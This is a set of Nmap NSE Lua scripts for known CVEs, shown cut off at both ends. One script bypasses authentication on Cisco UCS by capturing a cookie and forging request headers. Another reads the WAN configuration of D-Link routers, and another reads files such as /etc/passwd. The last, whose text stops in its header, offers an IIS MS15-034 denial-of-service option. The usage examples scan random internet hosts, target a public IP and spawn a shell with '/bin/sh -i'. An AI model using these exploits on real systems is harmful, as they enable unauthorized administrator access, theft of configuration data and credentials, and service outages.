eth0 } 121 | local socket = io.popen("netstat -r|grep 'default'|awk {'print $8'}") 122 | local int_addr = socket:read("*a"):gsub("\n", "") --> Strip 'new line' from interface 123 | socket:close() 124 | -- Storing Internal IP address to be used in header['host'] and header['referer'] 125 | local socket = io.popen("ifconfig "..int_addr.."|grep -m 1 'inet'|awk {'print $2'}") 126 | ip_addr = socket:read("*a"):gsub("\n", ""):gsub(" ", "") --> Strip 'new line'+'empty spaces' 127 | socket:close() 128 | elseif (string.find(flavor, "[Ww]indows")) then 129 | -- Executing CMD command and store results 130 | -- Storing Internal IP address to be used in header['host'] and header['referer'] 131 | local socket = io.popen("ipconfig|FINDSTR IPv4") 132 | ip_addr = socket:read("*a"):match(":(.*)"):gsub(" ", "") --> match everything after : 133 | socket.close() 134 | else 135 | -- This nse script its written to execute ONLY in (Local) Windows or Linux Operative Systems. 136 | print("| cisco-cve-2019-1937:\n| State: not compatible flavor: "..flavor.."\n| Remark: This nse only exec under Windows or Linux flavors\n|_") 137 | return nil 138 | end 139 | end 140 | 141 | 142 | -- Make sure we have the 'ip_addr' local variable set by now. { auto | manual } 143 | -- string.match(ip_addr, '%a+') will try to match any chars/words in ip_addr variable 144 | -- and automatic aborts nse execution { good response = ip addr must not contain letters } 145 | if (string.match(ip_addr, '%a+') or ip_addr == nil or ip_addr == "") then 146 | print("| cisco-cve-2019-1937:\n| State: nse cant retrieve internal ip addr\n| Manual Input: --script-args lhost=192.168.1.71,verbose=true\n|_") 147 | return nil --> abort further tests. 
148 | end 149 | 150 | 151 | -- Identify servers that answer 200 to invalid HTTP requests 152 | -- and exit as these would invalidate the next nse tests 153 | local status_404, result_404, _ = http.identify_404(host, port) 154 | if ( status_404 and result_404 == 200 ) then 155 | print("| cisco-cve-2019-1937:\n| Uri: http://"..host.ip..":"..port.number.." (false positive)\n| Reason: All URIs tested return status [200] OK\n|_") 156 | return nil 157 | end 158 | 159 | 160 | -- Send [1º] GET request - to capture redirection = header['Location'] 161 | -- redirection local variable its then parsed to extract the redirection url, 162 | -- and rewrites uri local variable with the captured url { use in [2º] GET request } 163 | if ( not(ip_addr == nil or ip_addr == "") ) then 164 | local _send = {header={}} --> Build TCP request 'header' 165 | _send['header']['Host'] = ip_addr 166 | _send['header']['User-Agent'] = decoy_agent 167 | _send['header']['X-Requested-With'] = "XMLHttpRequest" 168 | _send['header']['Accept-Language'] = "en-GB,en;q=0.8,sv" 169 | if ( port.number == 80 ) then _send['header']['Referer'] = "http://"..ip_addr.."/" end 170 | if ( port.number == 443 ) then _send['header']['Referer'] = "https://"..ip_addr.."/" end 171 | 172 | -- Send [1º] GET request and read response 173 | local response = http.get(host, port, uri, _send, { no_cache = true, no_cache_body = true }) 174 | if ( not(response or response.status) ) then 175 | uri_stats = "uri not found" 176 | elseif (response and response.status == 404) then 177 | uri_stats = "uri not found" 178 | http_err = response.status or "404" 179 | elseif (response and response.status == 302 or response.status == 303) then 180 | -- if [302|303] then Grab redirection url to use on next GET request 181 | local redirection = response.header and response.header['location'] or "" 182 | if ( not(redirection == nil or redirection == "") ) then 183 | -- Extract only the url from header['Location'] { /app/ui/login.jsp } 184 | -- 
This function strips from capture: { Location: Http[s]://192.168.1.71 } 185 | uri = redirection:match("[Hh]ttp[s]?://(.*)"):gsub(ip_addr, "");uri_stats = "true" 186 | -- Make sure we have been redirected to the rigth url: { /app/ui/login.jsp } 187 | if ( not(uri:match("/login")) ) then uri_stats = "Wrong header redirection"; http_err = response.status or "404" end 188 | else 189 | -- None redirection header['Location'] found 190 | uri_stats = "none header redirection" 191 | http_err = response.status or "nil" 192 | end 193 | else 194 | -- Wrong status code received 195 | uri_stats = "uri not found" 196 | http_err = response.status or "404" 197 | end 198 | end 199 | 200 | 201 | -- Send [2º] GET request - Follow the redirection uri to capture Set-Cookie { auth cookie } 202 | -- we are now sending a GET request using the redirection url captured in last request { rewrite uri } 203 | -- Set-Cookie: JSESSIONID=95B8A2D15F1E0712B444F208E179AE2354E374CF31974DE2D2E1C14173EAC745; Path=/app; Secure; HttpOnly 204 | if ( uri_stats == "true" ) then 205 | local _hijack = {header={}} --> Build TCP request 'header' 206 | _hijack['header']['Host'] = ip_addr 207 | _hijack['header']['User-Agent'] = decoy_agent 208 | _hijack['header']['X-Requested-With'] = "XMLHttpRequest" 209 | _hijack['header']['Accept-Language'] = "en-GB,en;q=0.8,sv" 210 | if ( port.number == 80 ) then _hijack['header']['Referer'] = "http://"..ip_addr.."/" end 211 | if ( port.number == 443 ) then _hijack['header']['Referer'] = "https://"..ip_addr.."/" end 212 | 213 | -- Send [2º] GET request and read response 214 | local res = http.get(host, port, uri, _hijack, { no_cache = true, no_cache_body = true }) 215 | if ( not(res or res.status) ) then 216 | cookie_stats = "none response from server" 217 | elseif (res and res.status == 200) then 218 | -- if [200] then Grab Set-Cookie value to use on next GET request. 
219 | local set_cookie = res.header and res.header['set-cookie'] or "" 220 | if ( not(set_cookie == nil or set_cookie == "") ) then 221 | cookie_stats = "true" 222 | -- Extract only the cookie value from header['Set-Cookie'] { strip extra chars } 223 | -- Sometimes ['set-cookie'] field does not contain { Secure; | HttpOnly } strings. 224 | -- This function will strip (delete) ALL those extra strings from captured Cookie. 225 | parse_cookie = set_cookie:match(":(.*)") --> match everything after [ : ] char 226 | if ( not(parse_cookie:match(";")) ) then 227 | local extr_semi = parse_cookie:gsub(" ", "") --> strip empty spaces from cookie value 228 | parse_cookie = extr_semi..";" --> add ; to the end of cookie value 229 | else 230 | local extr_char = parse_cookie:match(";(.*)") --> match everything after [ ; ] char 231 | parse_cookie = parse_cookie:gsub(extr_char, ""):gsub(" ", "") 232 | end 233 | -- Make sure that we have captured the rigth cookie name { JSESSIONID= } 234 | -- Users can still bypass this cookie name check by calling script @args "force_cookie=true" 235 | if ( not(parse_cookie:match("^JSESSIONID[=$]")) and force_cookie == "false" ) then 236 | cookie_err = res.status or "nil"; cookie_stats = "wrong cookie name"; parse_cookie = "nil" 237 | end 238 | else 239 | -- None header['Set-Cookie'] found 240 | cookie_stats = "none cookie" 241 | cookie_err = res.status or "nil" 242 | end 243 | else 244 | -- Wrong status code received 245 | cookie_stats = "Wrong status code" 246 | cookie_err = res.status or "404" 247 | end 248 | end 249 | 250 | 251 | -- Build Nmap vulnerable {table} 252 | local vuln_table = { 253 | title = "Cisco UCS Supervisor (Web Interface Auth Bypass)", 254 | state = vulns.STATE.NOT_VULN, 255 | IDS = {CVE = 'CVE-2019-1937'}, 256 | risk_factor = "Critical", 257 | scores = { 258 | CVSSv2 = "10.0 CRITICAL (AV:N/AC:L/Au:N/C:C/I:C/A:C)", 259 | }, 260 | description = [[ 261 | A vulnerability in the web-based management interface of Cisco Integrated 
Management Controller (IMC) Supervisor, 262 | Cisco UCS Director, and Cisco UCS Director Express for Big Data could allow an unauthenticated, remote attacker 263 | to acquire a valid session token with administrator privileges, bypassing user authentication. The vulnerability 264 | is due to insufficient request header validation during the authentication process. An attacker could exploit this 265 | vulnerability by sending a series of malicious requests to an affected device. An exploit could allow the attacker 266 | to use the acquired session token to gain full administrator access to the affected device. 267 | ]], 268 | references = { 269 | 'https://nvd.nist.gov/vuln/detail/CVE-2019-1937', 270 | 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190821-imcs-ucs-authby', 271 | 'https://packetstormsecurity.com/files/154239/Cisco-UCS-IMC-Supervisor-Authentication-Bypass-Command-Injection.html', 272 | }, 273 | dates = { 274 | disclosure = {year = '2019', month = 'Ago', day = '21'}, 275 | }, 276 | exploit_results = {}, --> Display auth cookie and creds 277 | } 278 | 279 | -- Build vulnerable stdout { vuln_table } 280 | if (uri_stats == "true" and cookie_stats == "true") then 281 | table.insert(vuln_table.exploit_results, string.format("Attack Vector: Remote")) 282 | if (port.number == 443) then table.insert(vuln_table.exploit_results, string.format("Uri: https://"..host.ip..":"..port.number..uri)) end 283 | if (port.number == 80) then table.insert(vuln_table.exploit_results, string.format("Uri: http://"..host.ip..":"..port.number..uri)) end 284 | table.insert(vuln_table.exploit_results, string.format("Auth-Cookie: "..parse_cookie.."\n")) 285 | end 286 | 287 | 288 | -- Send [3º] GET request - admin session cookie Authentication 289 | if (uri_stats == "true" and cookie_stats == "true") then 290 | local _exploit = {header={}} --> Build TCP request 'header' 291 | _exploit['header']['Host'] = ip_addr 292 | _exploit['header']['Cookie'] = 
parse_cookie 293 | _exploit['header']['User-Agent'] = decoy_agent 294 | _exploit['header']['X-Requested-With'] = "XMLHttpRequest" 295 | _exploit['header']['X-Starship-UserSession-Key'] = "ssa" --> can be a random string 296 | _exploit['header']['X-Starship-Request-Key'] = "redteam" --> can be a random string 297 | _exploit['header']['Accept-Language'] = "en-GB,en;q=0.8,sv" 298 | if ( port.number == 80 ) then _exploit['header']['Referer'] = "http://"..ip_addr.."/" end 299 | if ( port.number == 443 ) then _exploit['header']['Referer'] = "https://"..ip_addr.."/" end 300 | 301 | -- Send [3º] GET request and read response 302 | uri = "/app/ui/ClientServlet?apiName=GetUserInfo" 303 | local vuln_test = http.get(host, port, uri, _exploit, { no_cache = true, no_cache_body = true }) 304 | if (vuln_test and vuln_test.status == 200) then 305 | vuln_table.state = vulns.STATE.VULN 306 | local report = vulns.Report:new(SCRIPT_NAME, host, port) 307 | return report:make_output(vuln_table) 308 | elseif (vuln_test and vuln_test.status ~= 200) then 309 | -- Delete the last char from [Referer] to build display 310 | local parse_ref = _exploit['header']['Referer']:sub(1, -2) 311 | return "\n Cisco UCS (Web Interface Auth Bypass)\n State: POSSIBLE VULNERABLE to CVE-2019-1937 [ ? ]\n Remark: _exploit['header']['Cookie'] authentication Failed.\n Port: "..port.number.." 
Uri: "..parse_ref..":"..port.number..uri.."\n Auth-Cookie: "..parse_cookie.."\n\n" 312 | end 313 | 314 | -- Error messages { IF: verbose=true } 315 | elseif (uri_stats == "uri not found" and verbose == "true") then 316 | return "\n Cisco UCS (Web Interface Auth Bypass)\n State: NOT VULNERABLE to CVE-2019-1937\n Reason: ["..http_err.."] uri not found in server\n\n" 317 | elseif (uri_stats == "none header redirection" and verbose == "true") then 318 | return "\n Cisco UCS (Web Interface Auth Bypass)\n State: NOT VULNERABLE to CVE-2019-1937\n Reason: ["..http_err.."] None redirection header found\n\n" 319 | elseif (uri_stats == "Wrong header redirection" and verbose == "true") then 320 | return "\n Cisco UCS (Web Interface Auth Bypass)\n State: NOT VULNERABLE to CVE-2019-1937\n Reason: ["..http_err.."] Wrong url redirection\n\n" 321 | elseif (cookie_stats == "none response from server" and verbose == "true") then 322 | return "\n Cisco UCS (Web Interface Auth Bypass)\n State: NOT VULNERABLE to CVE-2019-1937\n Reason: ["..cookie_err.."] None response from server\n\n" 323 | elseif (cookie_stats == "wrong cookie name" and verbose == "true") then 324 | return "\n Cisco UCS (Web Interface Auth Bypass)\n State: NOT VULNERABLE to CVE-2019-1937 [ ? 
]\n Reason: ["..parse_cookie.."] wrong cookie name\n Remark: bypass cookie name checks: --script-args force_cookie=true\n\n" 325 | elseif (cookie_stats == "Wrong status code" and verbose == "true") then 326 | return "\n Cisco UCS (Web Interface Auth Bypass)\n State: NOT VULNERABLE to CVE-2019-1937\n Reason: ["..cookie_err.."] Wrong status code received\n\n" 327 | elseif (cookie_stats == "none cookie" and verbose == "true") then 328 | return "\n Cisco UCS (Web Interface Auth Bypass)\n State: NOT VULNERABLE to CVE-2019-1937\n Reason: ["..cookie_err.."] None authentication cookie found\n\n" 329 | end 330 | end 331 | -------------------------------------------------------------------------------- /dlink-cve-2019-13101.nse: -------------------------------------------------------------------------------- 1 | --- 2 | -- Nmap NSE dlink-cve-2019-13101.nse - Version 1.12 3 | -- Copy to: /usr/share/nmap/scripts/dlink-cve-2019-13101.nse 4 | -- Update NSE database: sudo nmap --script-updatedb 5 | -- execute: nmap --script-help dlink-cve-2019-13101.nse 6 | -- Port(s) accepted by this nse: 80,443,8080-8082 7 | --- 8 | 9 | 10 | description = [[ 11 | 12 | Module Author: r00t-3xp10it {Disclosure = Devendra Singh} 13 | Detects whether the D-Link DIR-600 or DIR-615 router is vulnerable to Incorrect Access Control Vulnerability (CVE-2019-13101). 14 | A remote vulnerability was discovered on D-Link DIR-600M/DIR-615 Wireless Home Router in multiple respective firmware versions 15 | (3.02 up to 3.06). The vulnerability provides unauthenticated remote access to the routers WAN configuration page i.e. '/wan.htm' 16 | which leads to disclosure of sensitive user info about the WAN, including but not limited to PPPoE, DNS configuration etc, also 17 | allowing us to change the router configuration settings. 
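
Some Syntax examples:
nmap --script-help dlink-cve-2019-13101.nse
nmap -sV -Pn -n -p 80,443,8080-8082 --open --script dlink-cve-2019-13101.nse 37.99.213.95
nmap -sV -Pn -n -p 80,443 --open --script dlink-cve-2019-13101.nse --script-args "verbose=true" 37.99.213.95
nmap -sS -Pn -n -p 80,443,8080-8082 --open --script dlink-cve-2019-13101.nse --script-args "uri=/" 37.99.213.95
nmap -sS -Pn -n -p 80,443 --open --script dlink-cve-2019-13101.nse --script-args "uri=/,User-Agent=Apache-HttpClient/4.0.3" 37.99.213.95
nmap -sV -v -Pn -n -T4 -iR 800 -p 80,443,8080 --open --script=http-headers.nse,dlink-cve-2019-13101.nse --script-args "verbose=true"

]]

---
-- @usage:
-- nmap --script-help dlink-cve-2019-13101.nse
-- nmap -sV -Pn -n -p 80,443,8080-8082 --open --script dlink-cve-2019-13101.nse 37.99.213.95
-- nmap -sV -Pn -n -p 80,443 --open --script dlink-cve-2019-13101.nse --script-args "verbose=true" 37.99.213.95
-- nmap -sS -Pn -n -p 80,443,8080-8082 --open --script dlink-cve-2019-13101.nse --script-args "uri=/" 37.99.213.95
-- nmap -sS -Pn -n -p 80,443 --open --script dlink-cve-2019-13101.nse --script-args "uri=/,User-Agent=Apache-HttpClient/4.0.3" 37.99.213.95
-- nmap -sV -v -Pn -n -T4 -iR 800 -p 80,443,8080 --open --script=http-headers.nse,dlink-cve-2019-13101.nse --script-args "verbose=true"
-- @output
-- PORT STATE SERVICE VERSION
-- 443/tcp open http D-Link DIR-600 WAP http config
-- | dlink-cve-2019-13101:
-- | VULNERABLE:
-- | D-Link DIR-600/615 Wireless Home Router
-- | State: VULNERABLE
-- | IDs: CVE:CVE-2019-13101
-- | Risk factor: Medium CVSSv2: 7.5 (MEDIUM) (AV:N/AC:L/Au:N/C:P/I:P/A:P)
-- | A remote vulnerability was discovered on D-Link DIR-600/DIR-615 Wireless Home Router in multiple respective firmware
-- | versions (3.02 up to 3.06). The vulnerability provides unauthenticated remote access to the routers WAN configuration
-- | page i.e. '/wan.htm', which leads to disclosure of sensitive info about the WAN, including but not limited to PPPoE,
-- | DNS configuration etc, also allowing us to change the router configuration settings.
-- |
-- | Disclosure date: 2019-Ago-08
-- | Exploit results:
-- | Uri: https://37.99.213.95:443/wan.htm
-- | DLink version: DIR-600 Ver 3.02
-- | Found a match between (TITLE|PPPoE)
-- |
-- | References:
-- | https://nvd.nist.gov/vuln/detail/CVE-2019-13101
-- | https://www.cybersecurity-help.cz/vdb/SB2019081001
-- | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13101
-- |_
-- @args verbose => Display More verbose outputs - Default: false
-- @args uri => the URL path to search in host.ip - Default: /wan.htm
-- @args User-Agent => User-Agent to send in requests - Default: Googlebot/2.1
---


author = "r00t-3xp10it"
copyright = "Devendra Singh"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
-- "safe" (the original had the typo "save", which is not an Nmap category,
-- so `--script safe` / `--script "safe and vuln"` never selected this script).
categories = {"safe", "vuln"}


-- DEPENDENCIES (lua nse libs) --
local http = require "http"
local table = require "table"
local vulns = require "vulns"
local stdnse = require "stdnse"
local string = require "string"
local shortport = require "shortport"


-- THE RULE SECTION --
portrule = shortport.port_or_service({80, 443, 8080, 8081, 8082}, "http, http-proxy, https", "tcp", "open")
local verbose = stdnse.get_script_args(SCRIPT_NAME..".verbose") or "false"
local uri = stdnse.get_script_args(SCRIPT_NAME..".uri") or "/wan.htm"


-- Server header values (after the optional "<os>, HTTP/1.x, " prefix) that
-- identify affected firmware: DIR-600 / DIR-615 3.02 up to 3.06.
-- "DIR-600 Ver 2.17" was a debugging entry in the previous revision and is
-- NOT affected; it is left out so it no longer yields a false positive.
local VULN_VERSIONS = {
  "DIR-600 Ver 3.02", "DIR-600 Ver 3.03", "DIR-600 Ver 3.04", "DIR-600 Ver 3.05", "DIR-600 Ver 3.06",
  "DIR-615 Ver 3.02", "DIR-615 Ver 3.03", "DIR-615 Ver 3.04", "DIR-615 Ver 3.05", "DIR-615 Ver 3.06",
}

-- Page markers looked up with a plain (non-pattern) find, so the '-' in the
-- names needs no escaping (the original's unescaped "D-LINK ..." title was
-- interpreted as a pattern and only matched by accident).
local TITLE_MARKERS = {
  "D-LINK SYSTEMS, INC. | WIRELESS ROUTER | HOME", --> full HTTP title (default)
  "D-LINK",                                        --> D-LINK expressions
  "DIR-6",                                         --> DIR-600 and DIR-615
}

-- Common prefix of every verbose "not vulnerable" message.
local NOT_VULN = "\n D-Link DIR-600/615 Wireless Home Router\n State: NOT VULNERABLE to CVE-2019-13101\n Reason: "

-- Some firmwares answer "Linux, HTTP/1.1, DIR-600 Ver 3.02"; return only the
-- model/version part.  (The original chopped a fixed 17 characters.)
local function model_from_server(header_server)
  if header_server:find("HTTP/1.1,", 1, true) or header_server:find("HTTP/1.2,", 1, true) then
    return header_server:match("HTTP/1%.[12],%s*(.*)$") or header_server
  end
  return header_server
end

-- True when the model string is one of the affected firmware versions.
local function is_vuln_version(model)
  for _, candidate in ipairs(VULN_VERSIONS) do
    if model == candidate then return true end
  end
  return false
end

-- True when the body carries a D-Link title marker or the PPPoE form.
-- A missing body (nil) is simply "no match"; the original passed nil to
-- string.find() and raised an error.
local function body_matches(body)
  if not body then return false end
  for _, marker in ipairs(TITLE_MARKERS) do
    if body:find(marker, 1, true) then return true end
  end
  return body:find("PPPoE", 1, true) ~= nil
end


-- THE ACTION SECTION --
-- Three checks must all hold for a VULNERABLE verdict:
--   [001] the uri answers 200 itself (no redirect to a login page)
--   [002] the Server header names an affected firmware
--   [003] the body looks like the WAN page (title marker or PPPoE)
action = function(host, port)
  -- Options for http.get: decoy request headers plus no-cache / no-redirect.
  -- (Nmap's http.get takes one options table; the original passed headers
  -- and options as two arguments, so the second one was ignored.)
  local options = {
    header = {
      ["User-Agent"] = stdnse.get_script_args(SCRIPT_NAME..".User-Agent") or "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
      ["Accept-Language"] = "en-GB,en;q=0.8,sv",
      ["Cache-Control"] = "no-store",
    },
    redirect_ok = false,
    no_cache = true,
    no_cache_body = true,
  }

  -- Servers answering [200] to invalid requests would invalidate the tests.
  local status_404, result_404 = http.identify_404(host, port)
  if status_404 and result_404 == 200 then
    print("CVE-2019-13101:\n| Exiting: "..host.ip..":"..port.number..uri.." (false positive)\n| Reason: All URIs tested return status [200] OK\n|_")
    return nil
  end

  -- One request serves all three checks (the original fetched the same uri twice).
  local response = http.get(host, port, uri, options)
  if not (response and response.status) then
    return nil
  end

  local uri_found = (response.status == 200)
  local model = model_from_server(response.header and response.header['server'] or "")
  local version_match = is_vuln_version(model)
  local content_match = body_matches(response.body)

  if not uri_found then
    if verbose == "true" then return NOT_VULN.."[001] Uri Not Found in Response\n\n" end
    return nil
  elseif not version_match then
    if verbose == "true" then return NOT_VULN.."[002] Not Vuln Server Version\n\n" end
    return nil
  elseif not content_match then
    if verbose == "true" then return NOT_VULN.."[003] None Match Found (TITLE|PPPoE)\n\n" end
    return nil
  end

  -- All three tests succeeded: build the Nmap vulnerable {table}
  local scheme = (port.number == 443) and "https" or "http"
  local vuln_table = {
    title = "D-Link DIR-600/615 Wireless Home Router",
    state = vulns.STATE.VULN,
    IDS = {CVE = 'CVE-2019-13101'},
    risk_factor = "Medium",
    scores = {
      CVSSv2 = "7.5 (MEDIUM) (AV:N/AC:L/Au:N/C:P/I:P/A:P)",
    },
    description = [[
A remote vulnerability was discovered on D-Link DIR-600/DIR-615 Wireless Home Router in multiple respective firmware
versions (3.02 up to 3.06). The vulnerability provides unauthenticated remote access to the routers WAN configuration
page i.e. '/wan.htm', which leads to disclosure of sensitive info about the WAN, including but not limited to PPPoE,
DNS configuration etc, also allowing us to change the router configuration settings.
    ]],
    references = {
      'https://nvd.nist.gov/vuln/detail/CVE-2019-13101',
      'https://www.cybersecurity-help.cz/vdb/SB2019081001',
      'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13101',
    },
    dates = {
      disclosure = {year = '2019', month = 'Ago', day = '08'},
    },
    exploit_results = {
      "Uri: "..scheme.."://"..host.ip..":"..port.number..uri,
      "DLink version: "..model,
      "Found a match between (TITLE|PPPoE)\n",
    },
  }
  local report = vulns.Report:new(SCRIPT_NAME, host, port)
  return report:make_output(vuln_table)
end
--------------------------------------------------------------------------------
/file-checker.nse:
--------------------------------------------------------------------------------
---
-- Nmap NSE file-checker.nse - Version 1.6
-- Copy script to: /usr/share/nmap/scripts/file-checker.nse
-- Update db: sudo nmap --script-updatedb
-- executing: nmap --script-help file-checker.nse
---


-- SCRIPT BANNER DESCRIPTION --
description = [[

Author: r00t-3xp10it
NSE script to check/read contents of the selected file/path in target webserver.
This module will search if 'index' exists, and if used --script-args read=true
then file-checker.nse script will read/display the contents of the 'index' file.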
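
This script also gives you the ability to search for a diferent 'index' (files or directory)
using --script-args index=/file-to-search or index=/directory-to-search, or set a diferent
User-agent to send in the ofending tcp packet --script-args agent=
'Default behavior its to search for robots.txt file in webserver'

This script also gives to is users the ability to use the lost '--interactive' nmap
switch, that allow us to interact with the bash shell inside of nmap funtions using:
nmap -sV -Pn -p 80 --script file-checker.nse --script-args "command=/bin/sh -i"
'WARNING: The 'command' argument does not work together with other script arguments'


Some Syntax examples:
nmap -sS -Pn -p 80 --open --script file-checker.nse
nmap -sS -Pn -p 80 --open --script file-checker.nse --script-args "index=/etc/passwd"
nmap -sS -Pn -p 80 --open --script file-checker.nse --script-args "command=/bin/sh -i"
nmap -sS -Pn -p 80 --open --script file-checker.nse --script-args "index=/robots.txt,read=true"
nmap -sS -Pn -p 80 --open --script file-checker.nse --script-args "agent=Mozilla/5.0 (compatible; EvilMonkey)"
nmap -sS -Pn -p 80 --open --script file-checker.nse --script-args "index=/index.html,read=true" --spoof-mac Apple
nmap -sV -Pn -T4 -iR 400 -p 80 --open --reason --script file-checker.nse --script-args "index=/etc/passwd,read=true" -oN creds.log
nmap -sI -Pn -p 80 --scan-delay 8 --script file-checker.nse --script-args "index=/robots.txt,read=true" ,

]]

---
-- @usage
-- nmap --script-help file-checker.nse
-- nmap -sS -Pn -p 80 --open --script file-checker.nse
-- nmap -sS -Pn -p 80 --open --script file-checker.nse --script-args "index=/etc/passwd"
-- nmap -sS -Pn -p 80 --open --script file-checker.nse --script-args "command=/bin/sh -i"
-- nmap -sS -Pn -p 80 --open --script file-checker.nse --script-args "index=/robots.txt,read=true"
-- nmap -sS -Pn -p 80 --open --script file-checker.nse --script-args "agent=Mozilla/5.0 (compatible; EvilMonkey)"
-- nmap -sS -Pn -p 80 --open --script file-checker.nse --script-args "index=/index.html,read=true" --spoof-mac Apple
-- nmap -sV -Pn -T4 -iR 400 -p 80 --open --reason --script file-checker.nse --script-args "index=/etc/passwd,read=true" -oN creds.log
-- nmap -sI -Pn -p 80 --scan-delay 8 --script file-checker.nse --script-args "index=/robots.txt,read=true" ,
-- @output
-- PORT STATE SERVICE
-- 80/tcp open http
-- | file-checker:
-- | index: /robots.txt
-- | STATUS: 200 OK FOUND
-- | module author: r00t-3xp10it
-- | user-agent : Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; ko; rv:1.9.1b2) Gecko/20081201 Firefox/3.1b2
-- |
-- | CONTENTS:
-- | # robots.txt of youtube since the time dinosaurs walk the hearth
-- | # This file should be placed into your website webroot directory.
-- |
-- | User-agent: *
-- | Disallow: /SSA/
-- | Disallow: /porn/
-- | Disallow: /login/
-- | Disallow: /cache/
-- | Disallow: /search/
-- | Disallow: /privacy/
-- | Disallow: /includes/
-- | Disallow: /credentials/
-- |_
-- @args search.index -> The file/path name to search -> Default: /robots.txt
-- @args fakeUser.agent -> The User-agent to send in header request -> Default: Mac OS X, Firefox
-- @args contents.read -> Read contents of the 'index' file selected ? -> Default: false
-- @args local.command -> interactive local shell (runs on the SCANNING machine, once per matching host/port) -> Default: false
---

author = "r00t-3xp10it"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"discovery", "safe"}


-- DEPENDENCIES (lua nse libraries) --
local shortport = require "shortport"
local stdnse = require ('stdnse')
local http = require "http"
local os = require "os"


-- THE RULE SECTION --
-- Port rule will only execute if port 80/443 tcp http/https its on open state
portrule = shortport.port_or_service({80, 443}, "http, https", "tcp", "open")
-- Script @args, or the defaults...
local index = stdnse.get_script_args(SCRIPT_NAME..".index") or "/robots.txt"
local command = stdnse.get_script_args(SCRIPT_NAME..".command") or "false"
local read = stdnse.get_script_args(SCRIPT_NAME..".read") or "false"
local agent_string = stdnse.get_script_args(SCRIPT_NAME..".agent") or "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; ko; rv:1.9.1b2) Gecko/20081201 Firefox/3.1b2"

-- Labels for the status codes reported individually; anything else is
-- "UNDEFINED ERROR", as before.
local STATUS_LABELS = {
  [200] = "OK FOUND",
  [302] = "REDIRECTED",
  [400] = "BAD REQUEST",
  [401] = "UNAUTHORIZED",
  [403] = "FORBIDDEN",
  [404] = "NOT FOUND",
  [503] = "UNAVAILABLE",
}

-- Output block shared by every branch; `contents` is appended only when
-- the file is to be displayed.
local function report(status_text, contents)
  local out = "\n index: "..index.."\n STATUS: "..status_text.."\n module author: r00t-3xp10it\n"
  if contents then
    out = out.." user-agent : "..agent_string.."\n\nCONTENTS:\n"..contents.."\n"
  end
  return out
end


-- THE ACTION SECTION --
if (command == "false") then
  -- Fetch 'index' from the target and report its status (and body if read=true).
  action = function(host, port)
    local options = {
      header = {
        ["User-Agent"] = agent_string, --> MAC OSX,Firefox User-agent OR your own...
        ["Accept-Language"] = "en-GB,en;q=0.8,sv", --> en-GB as default install language
        ["Cache-Control"] = "no-store", --> ask the webserver not to cache it
      },
      -- The script has its own "REDIRECTED" branch; do not let the http
      -- library follow a 302 silently (its default behaviour).
      redirect_ok = false,
    }
    local response = http.get(host, port, index, options)

    -- No answer at all: the original concatenated a nil status and crashed.
    if not (response and response.status) then
      return report("nil NO RESPONSE")
    end

    local label = STATUS_LABELS[response.status] or "UNDEFINED ERROR"
    if response.status == 200 and read == "true" then
      -- Display return code and index body ...
      return report(response.status.." "..label, response.body or "")
    end
    -- Display only the return code (default behavior)...
    return report(response.status.." "..label)
  end

else

  -- Execute a local system command (script arg).
  -- WARNING: this runs on the scanning machine with the scanner's
  -- privileges, and the action fires once for EVERY matching host/port in
  -- the scan - with -iR or a large target list the command is run repeatedly.
  action = function(host, port)
    os.execute(command)
    return "\n module author: r00t-3xp10it\n sys-command: "..command.."\n"
  end
end
--------------------------------------------------------------------------------
/ms15-034.nse:
--------------------------------------------------------------------------------
-- Original nse module written by: DigitalStroopwafel
-- Port nmap nse script to: /usr/share/nmap/scripts
-- Update database: sudo nmap --script-updatedb
-- Usage: sudo nmap --script-help ms15-034.nse
-- Usage: sudo nmap -sV -Pn -p 80 --script ms15-034.nse
-- Usage: sudo nmap -sS -Pn -p 80 --script ms15-034.nse --script-args "uri=/welcome.png, D0S=exploit"


-- Dependencies (Lua libs)
-- all dependencies are satisfied (nmap default installation)..
local http = require('http')
local string = require('string')
local shortport = require('shortport')
local stdnse = require ('stdnse')
local vulns = require ('vulns')


description = [[

author: DigitalStroopwafel, r00t-3xp10it
Detects for the MS15-034 (HTTP.sys) vulnerability on Microsoft IIS servers. and exploit
it using script args (--script-args D0S=exploit) or we can scan further using another
argument (--script-args uri=/wellcome.png), Affected versions are Windows 7, 8,
8.1, Windows Server 2008 R2, 2012 and 2012R2.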
25 | 26 | 27 | Some syntax examples: 28 | nmap -sV -Pn -p 80 --script vuln 29 | nmap -sV -Pn -p 80 --script ms15-034.nse 30 | nmap -sV -Pn -p 80 --script ms15-034.nse --script-args uri=/anotheruri 31 | nmap -sV -Pn -p 80,443,631,5800 --script ms15-034.nse --script-args D0S=exploit 32 | nmap -sS -Pn -p 80,443 --script ms15-034.nse --script-args "uri=/welcome.png, D0S=exploit" 33 | nmap -sS -Pn -p 80 --script ms15-034.nse --script-args "agent=Mozilla/5.0 (compatible; EvilMonkey),D0S=exploit" 34 | nmap -sS -sV -T3 -iR 30 -Pn -p 80,443,631,5800 --open --reason --script ms15-034.nse -oN /root/nmap-report.log 35 | 36 | ]] 37 | 38 | --- 39 | -- @usage 40 | -- nmap --script-help ms15-034.nse 41 | -- nmap -sV -Pn -p 80 --script vuln 42 | -- nmap -sS -Pn -p 80 --script ms15-034.nse 43 | -- nmap -sV -Pn -p 80 --script ms15-034.nse --script-args uri=/anotheruri/ 44 | -- nmap -sV -Pn -p 80,443,631,5800 --script ms15-034.nse --script-args D0S=exploit 45 | -- nmap -sS -Pn -p 80 --script ms15-034.nse --script-args "agent=Mozilla/5.0 (compatible; EvilMonkey),D0S=exploit" 46 | -- nmap -sS -Pn -p 80,443 --script ms15-034.nse --script-args "uri=/welcome.png, D0S=exploit" 47 | -- @output 48 | -- PORT STATE SERVICE 49 | -- 80/tcp open http 50 | -- |_ms15-034: http.sys its Vulnerable 51 | -- | State: VULNERABLE 52 | -- | IDs: CVE-2015-1635 53 | -- | Response: 416 (exploitable) 54 | -- | Disclosure date: 2015-06-17 55 | -- | Author: DigitalStroopwafel(module) 56 | -- | r00t-3xp10it(review) 57 | -- | 58 | -- | Description: 